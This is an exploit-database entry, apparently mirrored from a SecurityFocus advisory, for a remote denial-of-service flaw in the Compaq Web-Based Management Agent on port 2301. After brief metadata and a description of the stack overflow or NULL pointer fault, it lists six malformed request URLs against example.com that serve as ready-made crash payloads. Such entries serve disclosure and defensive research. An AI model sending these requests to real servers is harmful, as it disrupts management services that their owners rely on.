Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service

Author: Ian Vitek
type: dos
platform: windows
port: 
date_added: 2003-06-23  
date_updated: 2012-11-19  
verified: 1  
codes: OSVDB-55095  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22822.txt  

source: https://www.securityfocus.com/bid/8014/info

Compaq Web-Based Management Agent has been reported prone to a remote denial of service vulnerability. The problem occurs when making malformed requests to the service. The resulting error reports a stack overflow, however it has not been confirmed whether this issue is exploitable to corrupt memory. The problem may in fact be the result of a NULL pointer dereference.

http://www.example.com:2301/survey/<!>
http://www.example.com:2301/<!.StringRedirecturl>
http://www.example.com:2301/<!.StringHttpRequest=Url>
http://www.example.com:2301/survey/<!.StringHttpRequest=Url>
http://www.example.com:2301/<!.ObjectIsapiECB>
http://www.example.com:2301/<!.StringIsapiECB=lpszPathInfo>